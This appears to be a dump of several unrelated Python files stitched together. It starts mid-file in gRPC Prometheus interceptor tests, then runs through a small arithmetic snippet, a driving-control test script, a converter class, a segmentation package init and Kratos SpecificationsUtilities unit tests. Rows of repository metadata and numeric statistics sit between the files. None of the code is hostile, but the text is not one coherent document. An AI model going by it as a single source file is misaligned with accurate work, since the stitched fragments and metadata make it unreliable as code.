with patch(
'py_grpc_prometheus.prometheus_server_interceptor.'\
'PromServerInterceptor._compute_status_code',
side_effect=Exception('mocked error')
):
with pytest.raises(grpc.RpcError):
grpc_stub.SayHello(hello_world_pb2.HelloRequest(name="unary"))
@pytest.mark.parametrize("target_count", [1, 10, 100])
def test_grpc_server_handled_with_server_error_and_skip_exceptions(
target_count, grpc_server_with_exception_handling, grpc_stub
): # pylint: disable=unused-argument
for _ in range(target_count):
with pytest.raises(grpc.RpcError):
grpc_stub.SayHello(hello_world_pb2.HelloRequest(name="unknownError"))
target_metric = get_server_metric("grpc_server_handled")
assert target_metric.samples == []
@pytest.mark.parametrize("target_count", [1, 10, 100])
def test_grpc_server_handled_with_interceptor_error_and_skip_exceptions(
target_count, grpc_server_with_exception_handling, grpc_stub
): # pylint: disable=unused-argument
for _ in range(target_count):
with patch(
'py_grpc_prometheus.prometheus_server_interceptor.'\
'PromServerInterceptor._compute_status_code',
side_effect=Exception('mocked error')
):
assert grpc_stub.SayHello(
hello_world_pb2.HelloRequest(name="unary")
).message == "Hello, unary!"
target_metric = get_server_metric("grpc_server_handled")
assert target_metric.samples == []
@pytest.mark.parametrize("target_count", [1, 10, 100])
def test_grpc_server_handled_before_request_error(
target_count, grpc_server, grpc_stub
): # pylint: disable=unused-argument
for _ in range(target_count):
with patch(
'py_grpc_prometheus.grpc_utils.wrap_iterator_inc_counter',
side_effect=Exception('mocked error')
):
assert grpc_stub.SayHello(
hello_world_pb2.HelloRequest(name="unary")
).message == "Hello, unary!"
| 37.77381 | 75 | 0.759534 | 410 | 3,173 | 5.495122 | 0.170732 | 0.092765 | 0.075455 | 0.071904 | 0.901909 | 0.901909 | 0.901909 | 0.901909 | 0.901909 | 0.899689 | 0 | 0.016088 | 0.13804 | 3,173 | 83 | 76 | 38.228916 | 0.807678 | 0.060195 | 0 | 0.788732 | 0 | 0 | 0.16605 | 0.079664 | 0 | 0 | 0 | 0 | 0.084507 | 1 | 0.084507 | false | 0 | 0.070423 | 0 | 0.15493 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
aeba132299521096b7a1ff9bcfe31d464b8ac4b4 | 143 | py | Python | Python/Algorithm/NoClass.py | piovezan/SOpt | a5ec90796b7bdf98f0675457fc4bb99c8695bc40 | [
"MIT"
] | 148 | 2017-08-03T01:49:27.000Z | 2022-03-26T10:39:30.000Z | Python/Algorithm/NoClass.py | piovezan/SOpt | a5ec90796b7bdf98f0675457fc4bb99c8695bc40 | [
"MIT"
] | 3 | 2017-11-23T19:52:05.000Z | 2020-04-01T00:44:40.000Z | Python/Algorithm/NoClass.py | piovezan/SOpt | a5ec90796b7bdf98f0675457fc4bb99c8695bc40 | [
"MIT"
] | 59 | 2017-08-03T01:49:19.000Z | 2022-03-31T23:24:38.000Z | def somar(n1, n2):
return n1 + n2
def subtrair(n1, n2):
return n1 - n2
print(somar(5, 4))
#https://pt.stackoverflow.com/q/364546/101
| 15.888889 | 42 | 0.643357 | 25 | 143 | 3.68 | 0.64 | 0.173913 | 0.217391 | 0.26087 | 0.304348 | 0 | 0 | 0 | 0 | 0 | 0 | 0.163793 | 0.188811 | 143 | 8 | 43 | 17.875 | 0.62931 | 0.286713 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0.4 | 0.8 | 0.2 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
aef724a5d903609096782dc25d64db9f55683254 | 792 | py | Python | Thesis - Autonomous Car Chasing/RC_Version/test3.py | JahodaPaul/FIT_CTU | 2d96f18c7787ddfe340a15a36da6eea910225461 | [
"MIT"
] | 17 | 2019-03-09T17:13:40.000Z | 2022-03-05T14:42:05.000Z | Swayatta - Autonomous Car Follower System/Swayatta - RC Version/Test Code 3.py | VEDANTGHODKE/Swayatta---Autonomous-Driver-Assistance-System-ADAS-For-Indian-Environments | 7f0361c0f52e4e7623d975725497648cf582f36f | [
"MIT"
] | 1 | 2018-06-23T15:57:32.000Z | 2018-06-23T15:57:32.000Z | Swayatta - Autonomous Car Follower System/Swayatta - RC Version/Test Code 3.py | VEDANTGHODKE/Swayatta---Autonomous-Driver-Assistance-System-ADAS-For-Indian-Environments | 7f0361c0f52e4e7623d975725497648cf582f36f | [
"MIT"
] | 16 | 2019-04-09T00:10:55.000Z | 2022-02-21T20:28:05.000Z | from DrivingControl import DrivingControl
dr = DrivingControl(1.5)
print(dr.PredictSteerAndThrottle(1,0))
print(dr.PredictSteerAndThrottle(2,0))
print(dr.PredictSteerAndThrottle(2.5,0))
print(dr.PredictSteerAndThrottle(3,0))
print(dr.PredictSteerAndThrottle(3,0))
print(dr.PredictSteerAndThrottle(3,0))
print(dr.PredictSteerAndThrottle(2.5,0))
print(dr.PredictSteerAndThrottle(2.25,0))
print(dr.PredictSteerAndThrottle(2,0))
print(dr.PredictSteerAndThrottle(2,0))
print(dr.PredictSteerAndThrottle(1.8,0))
print(dr.PredictSteerAndThrottle(1.5,0))
print(dr.PredictSteerAndThrottle(1.5,0))
print(dr.PredictSteerAndThrottle(2.5,0))
print(dr.PredictSteerAndThrottle(3.5,0))
print(dr.PredictSteerAndThrottle(4.5,0))
print(dr.PredictSteerAndThrottle(5.5,0))
print(dr.PredictSteerAndThrottle(5,0))
| 34.434783 | 41 | 0.811869 | 108 | 792 | 5.953704 | 0.12963 | 0.195956 | 0.839813 | 0.819596 | 0.856921 | 0.805599 | 0.7014 | 0.7014 | 0.7014 | 0.653188 | 0 | 0.064052 | 0.034091 | 792 | 22 | 42 | 36 | 0.776471 | 0 | 0 | 0.55 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.05 | 0 | 0.05 | 0.9 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 9 |
9dd1d6d8cfbc570f115c106daa76368cc8259865 | 147 | py | Python | toornament/converter.py | niborus/toornament.py | e4267746ec1274e8158a10fc4f6357ae0928b03b | [
"MIT"
] | 1 | 2021-04-22T00:06:54.000Z | 2021-04-22T00:06:54.000Z | toornament/converter.py | niborus/toornament | e4267746ec1274e8158a10fc4f6357ae0928b03b | [
"MIT"
] | null | null | null | toornament/converter.py | niborus/toornament | e4267746ec1274e8158a10fc4f6357ae0928b03b | [
"MIT"
] | null | null | null | class Converter:
@staticmethod
def datetime(string):
return string
@staticmethod
def date(string):
return string
| 14.7 | 25 | 0.62585 | 14 | 147 | 6.571429 | 0.571429 | 0.326087 | 0.391304 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.312925 | 147 | 9 | 26 | 16.333333 | 0.910891 | 0 | 0 | 0.571429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0 | 0.285714 | 0.714286 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
ae61d3df5a1f7b03537c0a89f6364f470a04d0e8 | 594 | py | Python | seg_utils/__init__.py | QUAPNH/NucDetSeg | ad4040a359e52c611780b409f84b601bfa9c94e2 | [
"Apache-2.0"
] | 1 | 2022-02-21T11:05:09.000Z | 2022-02-21T11:05:09.000Z | seg_utils/__init__.py | lh0515/cas-dc-template | 5b0400ca5dc98d09beca36d46cc55bfabb9ce4e0 | [
"Apache-2.0"
] | null | null | null | seg_utils/__init__.py | lh0515/cas-dc-template | 5b0400ca5dc98d09beca36d46cc55bfabb9ce4e0 | [
"Apache-2.0"
] | 1 | 2022-02-21T11:05:01.000Z | 2022-02-21T11:05:01.000Z | from .seg_dataset_kaggle import NucleiCell
from .seg_transforms import (Compose, ConvertImgFloat, RandomContrast, RandomBrightness, SwapChannels,
RandomLightingNoise, PhotometricDistort, Expand, RandomSampleCrop,
RandomMirror_w, RandomMirror_h, Resize, ToTensor)
__all__ = [NucleiCell, Compose, ConvertImgFloat, RandomContrast, RandomBrightness, SwapChannels,
RandomLightingNoise, PhotometricDistort, Expand, RandomSampleCrop,
RandomMirror_w, RandomMirror_h, Resize, ToTensor] | 66 | 102 | 0.688552 | 42 | 594 | 9.47619 | 0.52381 | 0.035176 | 0.180905 | 0.261307 | 0.819095 | 0.819095 | 0.819095 | 0.819095 | 0.819095 | 0.819095 | 0 | 0 | 0.257576 | 594 | 9 | 103 | 66 | 0.902494 | 0 | 0 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
8880980f5eccb9da5f144d00683a2ec6e05e0367 | 20,759 | py | Python | kratos/tests/test_specifications_utilities.py | clazaro/Kratos | b947b82c90dfcbf13d60511427f85990d36b90be | [
"BSD-4-Clause"
] | null | null | null | kratos/tests/test_specifications_utilities.py | clazaro/Kratos | b947b82c90dfcbf13d60511427f85990d36b90be | [
"BSD-4-Clause"
] | null | null | null | kratos/tests/test_specifications_utilities.py | clazaro/Kratos | b947b82c90dfcbf13d60511427f85990d36b90be | [
"BSD-4-Clause"
] | null | null | null | from __future__ import print_function, absolute_import, division
# Importing the Kratos Library
import KratosMultiphysics
import KratosMultiphysics.KratosUnittest as KratosUnittest
import KratosMultiphysics.kratos_utilities as KratosUtils
dependencies_are_available = KratosUtils.CheckIfApplicationsAvailable("StructuralMechanicsApplication")
if dependencies_are_available:
import KratosMultiphysics.StructuralMechanicsApplication as StructuralMechanicsApplication
class TestSpecificationsUtilities(KratosUnittest.TestCase):
def test_specifications_utilities_elements(self):
current_model = KratosMultiphysics.Model()
model_part= current_model.CreateModelPart("Main")
node1 = model_part.CreateNewNode(1, 0.0,0.0,0.0)
node2 = model_part.CreateNewNode(2, 1.0,0.0,0.0)
node3 = model_part.CreateNewNode(3, 1.0,1.0,0.0)
prop1 = KratosMultiphysics.Properties(1)
model_part.AddProperties(prop1)
elem1 = model_part.CreateNewElement("Element2D3N", 1, [1,2,3], model_part.GetProperties()[1])
elem1.Initialize(model_part.ProcessInfo)
self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)
KratosMultiphysics.SpecificationsUtilities.AddMissingVariables(model_part)
self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z), False)
KratosMultiphysics.SpecificationsUtilities.AddMissingDofs(model_part)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z), False)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineTimeIntegration(model_part), [])
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineFramework(model_part), "lagrangian")
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineSymmetricLHS(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DeterminePositiveDefiniteLHS(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineIfCompatibleGeometries(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineIfRequiresTimeIntegration(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.CheckCompatibleConstitutiveLaws(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.CheckGeometricalPolynomialDegree(model_part), -1)
docu = KratosMultiphysics.Parameters("""{"Element2D3N" : "This is a pure geometric element, no computation"}""")
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.GetDocumention(model_part).IsEquivalentTo(docu), True)
def test_specifications_utilities_elements_list(self):
current_model = KratosMultiphysics.Model()
model_part= current_model.CreateModelPart("Main")
node1 = model_part.CreateNewNode(1, 0.0,0.0,0.0)
node2 = model_part.CreateNewNode(2, 1.0,0.0,0.0)
node3 = model_part.CreateNewNode(3, 1.0,1.0,0.0)
prop1 = KratosMultiphysics.Properties(1)
model_part.AddProperties(prop1)
elem1 = model_part.CreateNewElement("Element2D3N", 1, [1,2,3], model_part.GetProperties()[1])
elem1.Initialize(model_part.ProcessInfo)
list_entities = KratosMultiphysics.Parameters("""{
"element_list" : ["Element2D3N"]
}""")
self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)
KratosMultiphysics.SpecificationsUtilities.AddMissingVariablesFromEntitiesList(model_part, list_entities)
self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z), False)
KratosMultiphysics.SpecificationsUtilities.AddMissingDofsFromEntitiesList(model_part, list_entities)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z), False)
def test_specifications_utilities_conditions(self):
current_model = KratosMultiphysics.Model()
model_part= current_model.CreateModelPart("Main")
node1 = model_part.CreateNewNode(1, 0.0,0.0,0.0)
node2 = model_part.CreateNewNode(2, 1.0,0.0,0.0)
node3 = model_part.CreateNewNode(3, 1.0,1.0,0.0)
prop1 = KratosMultiphysics.Properties(1)
model_part.AddProperties(prop1)
cond1 = model_part.CreateNewCondition("SurfaceCondition3D3N", 1, [1,2,3], model_part.GetProperties()[1])
cond1.Initialize(model_part.ProcessInfo)
self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)
KratosMultiphysics.SpecificationsUtilities.AddMissingVariables(model_part)
self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z), False)
KratosMultiphysics.SpecificationsUtilities.AddMissingDofs(model_part)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z), False)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineTimeIntegration(model_part), [])
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineFramework(model_part), "lagrangian")
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineSymmetricLHS(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DeterminePositiveDefiniteLHS(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineIfCompatibleGeometries(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineIfRequiresTimeIntegration(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.CheckCompatibleConstitutiveLaws(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.CheckGeometricalPolynomialDegree(model_part), -1)
docu = KratosMultiphysics.Parameters("""{"SurfaceCondition3D3N" : "This is a pure geometric condition, no computation"}""")
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.GetDocumention(model_part).IsEquivalentTo(docu), True)
def test_specifications_utilities_conditions_list(self):
current_model = KratosMultiphysics.Model()
model_part= current_model.CreateModelPart("Main")
node1 = model_part.CreateNewNode(1, 0.0,0.0,0.0)
node2 = model_part.CreateNewNode(2, 1.0,0.0,0.0)
node3 = model_part.CreateNewNode(3, 1.0,1.0,0.0)
prop1 = KratosMultiphysics.Properties(1)
model_part.AddProperties(prop1)
cond1 = model_part.CreateNewCondition("SurfaceCondition3D3N", 1, [1,2,3], model_part.GetProperties()[1])
cond1.Initialize(model_part.ProcessInfo)
list_entities = KratosMultiphysics.Parameters("""{
"condition_list" : ["SurfaceCondition3D3N"]
}""")
self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)
KratosMultiphysics.SpecificationsUtilities.AddMissingVariablesFromEntitiesList(model_part, list_entities)
self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)
self.assertFalse(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X))
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z), False)
KratosMultiphysics.SpecificationsUtilities.AddMissingDofsFromEntitiesList(model_part, list_entities)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z), False)
@KratosUnittest.skipUnless(dependencies_are_available,"StructuralMechanicsApplication is not available")
def test_specifications_utilities_elements_dependencies(self):
current_model = KratosMultiphysics.Model()
model_part= current_model.CreateModelPart("Main")
node1 = model_part.CreateNewNode(1, 0.0,0.0,0.0)
node2 = model_part.CreateNewNode(2, 1.0,0.0,0.0)
node3 = model_part.CreateNewNode(3, 1.0,1.0,0.0)
prop1 = KratosMultiphysics.Properties(1)
model_part.AddProperties(prop1)
prop1.SetValue(KratosMultiphysics.CONSTITUTIVE_LAW, StructuralMechanicsApplication.LinearElasticPlaneStrain2DLaw())
elem1 = model_part.CreateNewElement("SmallDisplacementElement2D3N", 1, [1,2,3], model_part.GetProperties()[1])
elem1.Initialize(model_part.ProcessInfo)
self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)
KratosMultiphysics.SpecificationsUtilities.AddMissingVariables(model_part)
self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 3)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z), False)
KratosMultiphysics.SpecificationsUtilities.AddMissingDofs(model_part)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X), True)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y), True)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z), False)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineTimeIntegration(model_part).sort(), ['explicit', 'static', 'implicit'].sort())
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineFramework(model_part), "lagrangian")
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineSymmetricLHS(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DeterminePositiveDefiniteLHS(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineIfCompatibleGeometries(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineIfRequiresTimeIntegration(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.CheckCompatibleConstitutiveLaws(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.CheckGeometricalPolynomialDegree(model_part), -1)
docu = KratosMultiphysics.Parameters("""{"SmallDisplacementElement2D3N" : "This is a pure displacement element"}""")
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.GetDocumention(model_part).IsEquivalentTo(docu), True)
# Changing the law to get a False check
prop1.SetValue(KratosMultiphysics.CONSTITUTIVE_LAW, StructuralMechanicsApplication.LinearElasticPlaneStress2DLaw())
elem1.Initialize(model_part.ProcessInfo)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.CheckCompatibleConstitutiveLaws(model_part), False)
def test_specifications_utilities_elements_core_dependencies_list(self):
current_model = KratosMultiphysics.Model()
model_part= current_model.CreateModelPart("Main")
node1 = model_part.CreateNewNode(1, 0.0,0.0,0.0)
node2 = model_part.CreateNewNode(2, 1.0,0.0,0.0)
node3 = model_part.CreateNewNode(3, 1.0,1.0,0.0)
prop1 = KratosMultiphysics.Properties(1)
model_part.AddProperties(prop1)
elem1 = model_part.CreateNewElement("DistanceCalculationElementSimplex2D3N", 1, [1,2,3], model_part.GetProperties()[1])
elem1.Initialize(model_part.ProcessInfo)
list_entities = KratosMultiphysics.Parameters("""{
"element_list" : ["DistanceCalculationElementSimplex2D3N"]
}""")
self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)
KratosMultiphysics.SpecificationsUtilities.AddMissingVariablesFromEntitiesList(model_part, list_entities)
self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 1)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISTANCE), False)
KratosMultiphysics.SpecificationsUtilities.AddMissingDofsFromEntitiesList(model_part, list_entities)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISTANCE), True)
@KratosUnittest.skipUnless(dependencies_are_available,"StructuralMechanicsApplication is not available")
def test_specifications_utilities_elements_dependencies_list(self):
current_model = KratosMultiphysics.Model()
model_part= current_model.CreateModelPart("Main")
node1 = model_part.CreateNewNode(1, 0.0,0.0,0.0)
node2 = model_part.CreateNewNode(2, 1.0,0.0,0.0)
node3 = model_part.CreateNewNode(3, 1.0,1.0,0.0)
prop1 = KratosMultiphysics.Properties(1)
model_part.AddProperties(prop1)
prop1.SetValue(KratosMultiphysics.CONSTITUTIVE_LAW, StructuralMechanicsApplication.LinearElasticPlaneStrain2DLaw())
elem1 = model_part.CreateNewElement("SmallDisplacementElement2D3N", 1, [1,2,3], model_part.GetProperties()[1])
elem1.Initialize(model_part.ProcessInfo)
list_entities = KratosMultiphysics.Parameters("""{
"element_list" : ["SmallDisplacementElement2D3N"]
}""")
self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)
KratosMultiphysics.SpecificationsUtilities.AddMissingVariablesFromEntitiesList(model_part, list_entities)
self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 3)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z), False)
KratosMultiphysics.SpecificationsUtilities.AddMissingDofsFromEntitiesList(model_part, list_entities)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X), True)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y), True)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z), False)
@KratosUnittest.skipUnless(dependencies_are_available,"StructuralMechanicsApplication is not available")
def test_specifications_utilities_conditions_dependencies(self):
current_model = KratosMultiphysics.Model()
model_part= current_model.CreateModelPart("Main")
node1 = model_part.CreateNewNode(1, 0.0,0.0,0.0)
node2 = model_part.CreateNewNode(2, 1.0,0.0,0.0)
node3 = model_part.CreateNewNode(3, 1.0,1.0,0.0)
prop1 = KratosMultiphysics.Properties(1)
model_part.AddProperties(prop1)
cond1 = model_part.CreateNewCondition("SurfaceLoadCondition3D3N", 1, [1,2,3], model_part.GetProperties()[1])
cond1.Initialize(model_part.ProcessInfo)
self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)
KratosMultiphysics.SpecificationsUtilities.AddMissingVariables(model_part)
self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 3)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z), False)
KratosMultiphysics.SpecificationsUtilities.AddMissingDofs(model_part)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X), True)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y), True)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineTimeIntegration(model_part).sort(), ['explicit', 'static', 'implicit'].sort())
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineFramework(model_part), "lagrangian")
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineSymmetricLHS(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DeterminePositiveDefiniteLHS(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineIfCompatibleGeometries(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.DetermineIfRequiresTimeIntegration(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.CheckCompatibleConstitutiveLaws(model_part), True)
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.CheckGeometricalPolynomialDegree(model_part), -1)
docu = KratosMultiphysics.Parameters("""{"SurfaceLoadCondition3D3N" : "This is a pure displacement condition"}""")
self.assertEqual(KratosMultiphysics.SpecificationsUtilities.GetDocumention(model_part).IsEquivalentTo(docu), True)
@KratosUnittest.skipUnless(dependencies_are_available,"StructuralMechanicsApplication is not available")
def test_specifications_utilities_conditions_dependencies_list(self):
current_model = KratosMultiphysics.Model()
model_part= current_model.CreateModelPart("Main")
node1 = model_part.CreateNewNode(1, 0.0,0.0,0.0)
node2 = model_part.CreateNewNode(2, 1.0,0.0,0.0)
node3 = model_part.CreateNewNode(3, 1.0,1.0,0.0)
prop1 = KratosMultiphysics.Properties(1)
model_part.AddProperties(prop1)
cond1 = model_part.CreateNewCondition("SurfaceLoadCondition3D3N", 1, [1,2,3], model_part.GetProperties()[1])
cond1.Initialize(model_part.ProcessInfo)
list_entities = KratosMultiphysics.Parameters("""{
"condition_list" : ["SurfaceLoadCondition3D3N"]
}""")
self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 0)
KratosMultiphysics.SpecificationsUtilities.AddMissingVariablesFromEntitiesList(model_part, list_entities)
self.assertEqual(model_part.GetNodalSolutionStepDataSize(), 3)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y), False)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z), False)
KratosMultiphysics.SpecificationsUtilities.AddMissingDofsFromEntitiesList(model_part, list_entities)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_X), True)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Y), True)
self.assertEqual(node1.HasDofFor(KratosMultiphysics.DISPLACEMENT_Z), True)
def test_specifications_utilities_GetDofsListFromSpecifications(self):
# Set the test model part
current_model = KratosMultiphysics.Model()
model_part = current_model.CreateModelPart("Main")
model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISTANCE)
model_part.CreateNewNode(1,0.0,0.0,0.0)
model_part.CreateNewNode(2,1.0,0.0,0.0)
model_part.CreateNewNode(3,0.0,1.0,0.0)
model_part.CreateNewNode(4,1.0,1.0,0.0)
prop_1 = model_part.CreateNewProperties(1)
model_part.CreateNewElement("DistanceCalculationElementSimplex2D3N",1,[1,2,3],prop_1)
model_part.CreateNewElement("DistanceCalculationElementSimplex2D3N",2,[2,4,3],prop_1)
# Get the DOFs list from the elements specifications
dofs_list = KratosMultiphysics.SpecificationsUtilities.GetDofsListFromSpecifications(model_part)
# Check the obtained DOFs list
expected_dofs_list = ["DISTANCE"]
self.assertEqual(dofs_list, expected_dofs_list)
if __name__ == '__main__':
KratosUnittest.main()
